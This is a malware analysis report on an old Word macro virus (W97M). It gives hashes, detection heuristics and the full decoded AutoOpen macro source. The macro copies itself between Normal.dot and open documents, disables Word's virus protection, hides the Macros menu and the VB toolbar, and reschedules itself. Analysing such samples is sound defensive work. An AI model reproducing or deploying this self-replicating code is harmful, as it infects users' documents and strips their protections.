Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 072540303a343923…

MALICIOUS

Office (OLE)

37.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1f5d8d3dbda0bd570a088112c3d3561f SHA-1: 47fe521d53ab2771a853ec88a8d80880a432198c SHA-256: 072540303a343923866fb14f0ad6c5e57f4a5cb3e0df05862d698935759d14bc
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a legacy Word document containing a WordBasic AutoOpen macro. The macro's primary function appears to be to copy itself to the Normal.dot template, potentially to establish persistence or spread to other documents. The presence of the AutoOpen marker and the macro code strongly indicates malicious intent.

Heuristics 4

  • ClamAV: Win.Trojan.W97M-13 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.W97M-13
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11382 bytes
SHA-256: e478a532851e186b6f9cf890ecbcb8db468fdca801ee2cb75bd204259e8f5055
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Option Explicit

Public Sub MAIN()

Dim MyFile$
Dim OkExist
Dim TemplateName$
Dim internal
Dim xItem
Dim t
Dim s

s = "¸ß¾ÙµËСƽÀíÂÛΰ´óÆìÖÄ£¬°Ñ½¨ÉèÓÐÖйúÌØÉ«Éç»áÖ÷ÒåÊÂÒµÈ«ÃæÍÆÏò¶þʮһÊÀ¼Í"

'ÉèÖôíÎóÏÝÚå
On Error Resume Next

'»ñÈ¡»î¶¯ÎļþÃû
If ActiveDocument.Path = "" Then
  MyFile$ = ActiveDocument.Name
Else
  MyFile$ = ActiveDocument.Path + "\" + ActiveDocument.Name
End If

If MyFile$ = "" Then GoTo Bye

'Õûµã³öÏÖÈÕÆÚʱ¼äÐÅÏ¢
t = Format(Time, "hhmmss")
If Mid(t, 3, 2) = "00" And Not (Format(Date, "yyyy") = "1998" And Val(Format(Date, "mm")) < 9) Then
  MsgBox s, vbSystemModal, "CPSDI"
  'MsgBox Format(Date, "dddd,yyyy mmm dd") + "ÈÕ " + Format(Time, "hh") + "ʱ", vbSystemModal, "ÎÒµÄÌáÐÑ"
End If


' ÔÚͨÓÃÄ£°åÖвéÕÒÊÇ·ñÓÐAutoOpenºê
OkExist = 0
For Each xItem In NormalTemplate.VBProject.VBComponents
  If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
    OkExist = 1
    Exit For
  End If
Next xItem

' »ñȡͨÓÃÄ£°åµÄÎļþÃû
TemplateName$ = NormalTemplate.Path + "\" + NormalTemplate.Name

'ÉèÖÃͨÓÃÄ£°åµÄÎļþÊôÐÔΪµµ°¸²¢½â³ýÆä²¡¶¾·À»¤¹¦ÄÜ
SetAttr TemplateName$, vbNormal
Options.VirusProtection = False

' ¿½±´AutoOpenºêµ½Í¨ÓÃÄ£°å
If OkExist <> 1 Then
    Application.OrganizerCopy Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If

' ÔڻÎĵµÖвéÕÒÊÇ·ñÓÐAutoOpenºê
OkExist = 0
For Each xItem In ActiveDocument.VBProject.VBComponents
  If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
    OkExist = 1
    Exit For
  End If
Next xItem

'¿½±´AutoOpenºêµ½»î¶¯Îĵµ
If OkExist <> 1 Then
    Application.OrganizerCopy Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If

Bye:

' ÉèÖÃ×Ô¶¯ÔËÐÐAutoOpenºêµÄ¼ÆÊ±Æ÷
internal = "00:" + Str(10 - Val(Mid(t, 4, 1)))
Application.OnTime When:=Now + TimeValue(internal) - TimeValue("00:00:" + Right(t, 2)), Name:="AutoOpen", Tolerance:=60
DisableMacroMenu
DisableVBTools
End Sub
Public Sub DisableMacroMenu()
'ʹ¹¤¾ß²Ëµ¥ÖеĺêÃüÁî×éʧȥ×÷ÓÃ
Dim cb, xItem, xxItem, xxxItem
For Each cb In ActiveDocument.CommandBars
  If cb.Name = "Menu Bar" Then
    For Each xItem In cb.Controls
      If xItem.Caption = "¹¤¾ß(&T)" Then
        For Each xxItem In xItem.Controls
          If xxItem.Caption = "ºê(&M)" Then
            'xxItem.Enabled = True
            For Each xxxItem In xxItem.Controls
                xxxItem.Enabled = False
            Next xxxItem
            Exit Sub
          End If
        Next xxItem
      End If
    Next xItem
  End If
Next cb
End Sub
Public Sub DisableVBTools()
'ʹ¹¤¾ßÀ¸ÖеÄVisual Basicʧȥ×÷ÓÃ
Dim cb
For Each cb In ActiveDocument.CommandBars
  If cb.Name = "Visual Basic" Then
     cb.Enabled = False
     Exit For
  End If
Next cb
End Sub


' Processing file: /opt/analyzer/scan_staging/1ff3b30365454cf8b005998ac955e428.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/AutoOpen - 5970 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' Line #2:
' 	FuncDefn (Public Sub MAIN())
' Line #3:
' Line #4:
' 	Dim 
' 	VarDefn MyFile
' Line #5:
' 	Dim 
' 	VarDefn OkExist
' Line #6:
' 	Dim 
' 	VarDefn TemplateName
' Line #7:
' 	Dim 
' 	VarDefn internal
' Line #8:
' 	Dim 
' 	VarDefn xItem
' Line #9:
' 	Dim 
' 	VarDefn t
' Line #10:
' 	Dim 
' 	VarDefn s
' Line #11:
' Line #12:
' 	LitStr 0x0046 "¸ß¾ÙµËСƽÀíÂÛΰ´óÆìÖÄ£¬°Ñ½¨ÉèÓÐÖйúÌØÉ«Éç»áÖ÷ÒåÊÂÒµÈ«ÃæÍÆÏò¶þʮһÊÀ¼Í"
' 	St s 
' Line #13:
' Line #14:
' 	QuoteRem 0x0000 0x000C "ÉèÖôíÎóÏÝÚå"
' Line #15:
' 	OnError (Resume Next) 
' Line #16:
' Line #17:
' 	QuoteRem 0x0000 0x000E "»ñÈ¡»î¶¯ÎļþÃû"
' Line #18:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 
... (truncated)